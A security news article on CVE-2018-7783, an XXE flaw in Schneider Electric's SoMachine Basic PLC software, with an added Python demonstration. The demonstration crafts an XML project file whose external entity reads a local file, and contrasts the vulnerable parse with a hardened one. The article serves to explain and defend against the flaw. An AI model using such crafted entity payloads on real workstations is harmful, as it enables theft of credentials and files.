Schneider PLC exposes high-risk vulnerability allowing hackers to initiate remote attacks


Schneider Electric, a global leader in energy efficiency management, issued a fix last Tuesday for a high-risk vulnerability in its SoMachine Basic programming software that can be exploited remotely to obtain sensitive data.

SoMachine Basic, also known as EcoStruxure Machine Expert, is lightweight programming software designed specifically for the Schneider Modicon M221 Programmable Logic Controller (PLC) and used to develop the PLC program code.

Gjoko Krstic, a researcher at Applied Risk, an industrial network security company, recently found that SoMachine Basic 1.6.0 build 61653 and SoMachine Basic 1.5.5 SP1 build 60148 are affected by an XML External Entity (XXE) vulnerability, and all earlier versions are very likely affected as well. Because the software's XML parser resolves external entities declared in a file it opens, the flaw can be used to mount out-of-band (OOB) attacks, in which the parser is made to fetch an attacker-controlled resource and carry local data along with that request.

The vulnerability is tracked as CVE-2018-7783 and carries a CVSS v3 score of 8.6, which rates it high risk. It can be exploited by an unauthenticated remote attacker to read arbitrary files on the target system; those files may contain sensitive information such as passwords, user data, and details about the system.

Krstic pointed out that to exploit the vulnerability an attacker must trick the victim into opening a specially crafted SoMachine Basic project or template file. Under certain circumstances the vulnerability may also be exploited to execute arbitrary code or to force the target system into a denial-of-service (DoS) state.
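To make the mechanism concrete, the following is an added example (written for this page, not code from Applied Risk or Schneider Electric) of how a crafted XML project file turns into a local file read when the parser resolves external entities, and how the same file is neutralised when that resolution is disabled. The element names `SoMachineBasicProject`, `Name` and `Comment` are a constructed stand-in for the real project format, and the "secret" file is written by the example itself so that it runs offline; none of these come from the advisory.

```python
"""Added example: XXE in a project file -> local file read, and the hardened parse.

Assumptions (not from the advisory): the element names below are a constructed
stand-in for the real SoMachine Basic project format, and the target "secret"
file is created here only so the example runs offline.
"""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class ProjectHandler(ContentHandler):
    """Collects the text content of every element into a dict."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        # Text from an expanded external entity arrives here exactly as if it
        # had been typed into the project file, so it ends up in the parsed data.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_project(xml_bytes: bytes, resolve_external_entities: bool) -> dict:
    """Parse a project file with the standard-library SAX parser.

    resolve_external_entities=True reproduces the vulnerable configuration
    (external general entities are fetched and inlined); False is the hardened
    configuration, under which the entity reference expands to nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = ProjectHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.fields


def build_malicious_project(target_path: str) -> bytes:
    """Constructed attacker-controlled project file (hypothetical format).

    The internal DTD subset declares an external entity whose SYSTEM identifier
    points at a local file, and a text field references that entity.
    """
    target_uri = pathlib.Path(target_path).resolve().as_uri()
    return f"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE SoMachineBasicProject [
  <!ENTITY xxe SYSTEM "{target_uri}">
]>
<SoMachineBasicProject>
  <Name>Pump station</Name>
  <Comment>&xxe;</Comment>
</SoMachineBasicProject>
""".encode("utf-8")


def demo() -> tuple:
    """Write a stand-in secret, parse the crafted project both ways, and
    return (vulnerable_fields, hardened_fields)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w", encoding="utf-8") as f:
            # Constructed content standing in for a credentials file.
            f.write("CONSTRUCTED-SECRET: plc_admin / s3cr3t")
        payload = build_malicious_project(secret_path)
        vulnerable = parse_project(payload, resolve_external_entities=True)
        hardened = parse_project(payload, resolve_external_entities=False)
    return vulnerable, hardened


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable parser leaked:", repr(vulnerable["Comment"]))
    print("hardened parser saw:    ", repr(hardened["Comment"]))
```

The in-band variant shown here puts the file contents straight into a parsed field; the out-of-band variant mentioned above instead declares an entity pointing at an attacker-hosted URL so that the parser's own fetch carries the data off the workstation, which is why the fix has to disable external entity resolution (or reject any DOCTYPE outright) rather than merely hide the field from the user.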

Schneider Electric has fixed the vulnerability in SoMachine Basic v1.6 SP1 and recommends that users download the update as soon as possible or install it through the Schneider Electric software update tool.